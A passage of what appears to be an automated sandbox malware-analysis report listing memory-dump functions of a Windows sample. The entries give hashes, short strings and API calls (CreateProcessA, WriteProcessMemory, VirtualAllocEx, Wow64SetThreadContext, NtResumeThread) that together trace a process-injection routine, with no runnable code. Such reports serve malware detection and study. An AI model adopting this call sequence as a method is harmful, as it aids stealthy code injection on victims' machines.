                                                                                                                                  • Instruction ID: 76af5b87e0b0450e023e891cc07f010277f3ece7396d6b62eb13e2e016a063e9
                                                                                                                                  • Opcode Fuzzy Hash: 10895c2482b53d47fff5df14888131e3cd97031794adb96c40caf04bf75066c9
                                                                                                                                  • Instruction Fuzzy Hash: 1B21D2B1D012499FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C775A944CBA1
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 06160C2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: a90d99d6129b1e748c784a3c78bf58d0575b2964029accdfc3bc1d2594b70e14
                                                                                                                                  • Instruction ID: 1cf83154333089129fccb3dda3e79108131d9b219dc7d8e8369759812e35fc40
                                                                                                                                  • Opcode Fuzzy Hash: a90d99d6129b1e748c784a3c78bf58d0575b2964029accdfc3bc1d2594b70e14
                                                                                                                                  • Instruction Fuzzy Hash: 771108B5D002498ECB10DFAAC9446EEFBF4FF49314F10842AD459A7240C7789945CFA1
                                                                                                                                  APIs
                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 06160C2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 8bf72df189d4d4064a3efb3805c83e2bb3a2b34169667827f459840fdf61c857
                                                                                                                                  • Instruction ID: 17748c028324d1345b1b5f4a666aba8fb53ffb1feca8400137ee04397cca5225
                                                                                                                                  • Opcode Fuzzy Hash: 8bf72df189d4d4064a3efb3805c83e2bb3a2b34169667827f459840fdf61c857
                                                                                                                                  • Instruction Fuzzy Hash: 8911F6B5D003098FDB14DFAAC584AAEFBF4FF49314F60842AD519A7240CB78A945CFA5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: d6efcd4da095c099fc327a24660cdc817ab55b3c4bc08d6557f66f85b03c5bb4
                                                                                                                                  • Instruction ID: d6522a35d49ad7ce140f4f041856a87bc154fcbfbc37423aa3496873425cee6e
                                                                                                                                  • Opcode Fuzzy Hash: d6efcd4da095c099fc327a24660cdc817ab55b3c4bc08d6557f66f85b03c5bb4
                                                                                                                                  • Instruction Fuzzy Hash: 9EB10774E05218CFEB64DFAAD984BADBBF2BF89304F909169D009EB655D7309984CF00
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75b35dc6bbbd17d2af2ecf49f8dbf1c54a6a3bef3f757d92f2d6b3f8e7581aa6
                                                                                                                                  • Instruction ID: cf11e2b6ed5ceea2b85c4273aa8bf6f8e3aaff3401e4b3a10a6684589032697a
                                                                                                                                  • Opcode Fuzzy Hash: 75b35dc6bbbd17d2af2ecf49f8dbf1c54a6a3bef3f757d92f2d6b3f8e7581aa6
                                                                                                                                  • Instruction Fuzzy Hash: F7911A70D05218CFEB64DF66D844BADB7F2FB4A308F2491AAD009AB251EB745E85CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513733584.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c40000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: bc768112516f7fde4de29a3b9c705c2870b9f77dd1cac3cf3e43ef9aca6e7c0e
                                                                                                                                  • Instruction ID: 0cf542450424e6e59ff8bbf07498aa198cf22101cd50210356a7299974a2557e
                                                                                                                                  • Opcode Fuzzy Hash: bc768112516f7fde4de29a3b9c705c2870b9f77dd1cac3cf3e43ef9aca6e7c0e
                                                                                                                                  • Instruction Fuzzy Hash: 6DE2D170D09388DFDB56DBB5CC58BAE7FB5EF46300F18809AE140AB2A2C7785945CB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq$Haq$Haq
                                                                                                                                  • API String ID: 0-3013282719
                                                                                                                                  • Opcode ID: 5a0df07d81303679410f39364b39b49b890bd3651d0bdbe1b1481011026ebd07
                                                                                                                                  • Instruction ID: f59c3477efc0abf7222a94625d62b9df5a56ab9717c66f635bbafff895011952
                                                                                                                                  • Opcode Fuzzy Hash: 5a0df07d81303679410f39364b39b49b890bd3651d0bdbe1b1481011026ebd07
                                                                                                                                  • Instruction Fuzzy Hash: 40126C70A006098FCB54DFA9C495A6EBBF6FF84310F14852DE5469B3A5DB31EC46CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q$4']q
                                                                                                                                  • API String ID: 0-705557208
                                                                                                                                  • Opcode ID: 393b32890e322f7c780a53bcbba81b5a17e701994b506f5c28812efff260db91
                                                                                                                                  • Instruction ID: 70b8b57a7dbba1dfca950446c9712002c4e4279b544b2b4c63bfe1df928de231
                                                                                                                                  • Opcode Fuzzy Hash: 393b32890e322f7c780a53bcbba81b5a17e701994b506f5c28812efff260db91
                                                                                                                                  • Instruction Fuzzy Hash: EEF1C934A10219DFCB48DFA4D998E9DBBB2FF89310F158168E506AB365DB71EC42CB50

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$(aq$(aq
                                                                                                                                  • API String ID: 0-2593664646
                                                                                                                                  • Opcode ID: a963b66e84e65c5f2626459eb0cbe4b47df1fc17c98cb346aed577d642ae7e94
                                                                                                                                  • Instruction ID: 6e533e029d0e266744f1548c7b61aa21887e06814061669ed008cb7ca2485c7e
                                                                                                                                  • Opcode Fuzzy Hash: a963b66e84e65c5f2626459eb0cbe4b47df1fc17c98cb346aed577d642ae7e94
                                                                                                                                  • Instruction Fuzzy Hash: E351363270426A4FC755CF7DD8406AE7BE6EFC5720B2844AAE445CB392CA35DD02C7A1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513733584.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c40000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 043ae109a60897b089f5383ba35201b6f2d64773500970412c80a3adfec8ebf9
                                                                                                                                  • Instruction ID: a4a5e42cb869b49fc7d94c48d2f0e745921d824fce133297ca246661f24ecade
                                                                                                                                  • Opcode Fuzzy Hash: 043ae109a60897b089f5383ba35201b6f2d64773500970412c80a3adfec8ebf9
                                                                                                                                  • Instruction Fuzzy Hash: 11F10574E01208DFDB98EFA8E4896EDBBB6FF49311F205469E406A7354CB785A81CF50

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$d
                                                                                                                                  • API String ID: 0-3557608343
                                                                                                                                  • Opcode ID: 88eaf32a5f94f38b10757be7f3d10d64812e3f8ccdf354f00623a9a65bdac896
                                                                                                                                  • Instruction ID: ebae81048257eb35f362c6b35ed3cd12f768ac620103f0e2d398e51f219e926e
                                                                                                                                  • Opcode Fuzzy Hash: 88eaf32a5f94f38b10757be7f3d10d64812e3f8ccdf354f00623a9a65bdac896
                                                                                                                                  • Instruction Fuzzy Hash: BFD16D34A0060ACFC715CF19C58496ABBF6FF88324B15C55ED85A8B7A5DB30F845CBA1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513733584.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c40000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: df46e3771c876e54b8756e772d12a9fbe7becfd53313d4fc556bf54ed4c6a289
                                                                                                                                  • Instruction ID: ccf6d235c6f1d02dee8d2a39712b69f18d16a9aefe4fc322802a1706e563aee0
                                                                                                                                  • Opcode Fuzzy Hash: df46e3771c876e54b8756e772d12a9fbe7becfd53313d4fc556bf54ed4c6a289
                                                                                                                                  • Instruction Fuzzy Hash: 0191F070E01248CFCB98EFAAD4946EDBBB2FF89301F109069D41AB7290CB756941CF64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$Haq
                                                                                                                                  • API String ID: 0-3785302501
                                                                                                                                  • Opcode ID: 0d8958dc83d4b1171dd9f6601a8a2cef983ca6100056a9e4ae86db3755424f3b
                                                                                                                                  • Instruction ID: 1ffab38a4b83678a1514fc6d8f1e28214536dfd791635e3a31f5aa860fec7737
                                                                                                                                  • Opcode Fuzzy Hash: 0d8958dc83d4b1171dd9f6601a8a2cef983ca6100056a9e4ae86db3755424f3b
                                                                                                                                  • Instruction Fuzzy Hash: B4519B31B002568FC799AF38C854A6E7BA7FF85311B1045ACE5068B3A5CF35EC06CBA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$(aq
                                                                                                                                  • API String ID: 0-3916115647
                                                                                                                                  • Opcode ID: 7f309d73c1aa8b672b38d792a0fa1bc1aa84cf7d60fe303f042009de230073b5
                                                                                                                                  • Instruction ID: f20749cbf22755839051b2ae4555d65c7b5b517e377a7279013c1d2a31f2da7f
                                                                                                                                  • Opcode Fuzzy Hash: 7f309d73c1aa8b672b38d792a0fa1bc1aa84cf7d60fe303f042009de230073b5
                                                                                                                                  • Instruction Fuzzy Hash: 0A51CE3170021A9FDB589F29D854AAE3BA6FF85311F148069F906CB3A5CF35DC42CBA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: p`]q$p`]q
                                                                                                                                  • API String ID: 0-2072224024
                                                                                                                                  • Opcode ID: a823c5d3ebb1171e085184d92ad39a6a5966c24f9a59606f4feb3e11a1c5a1a3
                                                                                                                                  • Instruction ID: c583ff29691dbbf2b71be52f71ae4324b55b634b205bcb46f2bfd43e0c6bffa5
                                                                                                                                  • Opcode Fuzzy Hash: a823c5d3ebb1171e085184d92ad39a6a5966c24f9a59606f4feb3e11a1c5a1a3
                                                                                                                                  • Instruction Fuzzy Hash: 8E413A71A083498FC751CFACE440AAABFF5EF46320F1884AFE480DB252D630E954C7A1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq
                                                                                                                                  • API String ID: 0-3092978723
                                                                                                                                  • Opcode ID: 27333e160bbe9fa68af0b0b00e62a6e9d032bb9e7925f97442da5cf541af1161
                                                                                                                                  • Instruction ID: aa0cf15450d6357ea3d95620675c33dc9a357c71ee63231e3b4bb9d93343ad1a
                                                                                                                                  • Opcode Fuzzy Hash: 27333e160bbe9fa68af0b0b00e62a6e9d032bb9e7925f97442da5cf541af1161
                                                                                                                                  • Instruction Fuzzy Hash: 705208B5A002288FDB64CF69C985BADBBF6FF88310F1541D9E509A7351DA309E81CF61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (_]q
                                                                                                                                  • API String ID: 0-188044275
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0618F91A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0618F91A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2497971779.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_2660000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 061601E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 061601E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0618FF86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0266DD4E,?,?,?,?,?), ref: 0266DE0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2497971779.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_2660000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0618FF86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DBDB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DBDB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06E7D34C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514327490.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6e70000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0713FF96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514632032.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7120000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0266B4C4), ref: 0266B6FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2497971779.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_2660000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06E7E32B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514327490.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6e70000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: y
                                                                                                                                  • API String ID: 0-4225443349
                                                                                                                                  • Opcode ID: c0a9fddbdca602259bbafbab8b87682053556d52ff30abee9af933b3a79bf417
                                                                                                                                  • Instruction ID: 8c2e3c53f9ab0765fc4267f28b416459f762fb5eda3fd978262d80430ac66840
                                                                                                                                  • Opcode Fuzzy Hash: c0a9fddbdca602259bbafbab8b87682053556d52ff30abee9af933b3a79bf417
                                                                                                                                  • Instruction Fuzzy Hash: F0F0D474D15229CFEB759B51D848BDAB7B6BB05709F10119AD40972280C3B85B85CE81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f6f28c974f5195bc48a70784704df6b4c3af9672c1cc8a76d45f3e7f5c4ab5f8
                                                                                                                                  • Instruction ID: fc1a897ed1830e9b0b4c39371a865e001b6015436c81126aa0a953ff5f92fc66
                                                                                                                                  • Opcode Fuzzy Hash: f6f28c974f5195bc48a70784704df6b4c3af9672c1cc8a76d45f3e7f5c4ab5f8
                                                                                                                                  • Instruction Fuzzy Hash: 34E19F35B0020A9FDB55CF69E854BADBBF6EF88320F148169E915DB391CB31E841CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9be45d248cd9c52155ca237ba7f31466394b71550167e1a468fc5c7621ac7efe
                                                                                                                                  • Instruction ID: bff2b12f737f175b6c69fc297bd23c36ffe66e5f520b00c87cc9941b750391c6
                                                                                                                                  • Opcode Fuzzy Hash: 9be45d248cd9c52155ca237ba7f31466394b71550167e1a468fc5c7621ac7efe
                                                                                                                                  • Instruction Fuzzy Hash: 64B10870D0421ADFDBA8EFA9D5446ADBBF2EB89309F209129E415E7344D7345E41CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 576d058621fb54c594e9f0f174050e7a1b198873c38fb8f100899196855ff0e2
                                                                                                                                  • Instruction ID: 86e14e400b4e3f9cdc2a8e250e334b57aa470236fb0ecb55f010bf9874b95f6e
                                                                                                                                  • Opcode Fuzzy Hash: 576d058621fb54c594e9f0f174050e7a1b198873c38fb8f100899196855ff0e2
                                                                                                                                  • Instruction Fuzzy Hash: F2811835A10619CFCB54DF68C5849AEB7F6FF48310B1A8569E806DB364DB31ED41CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
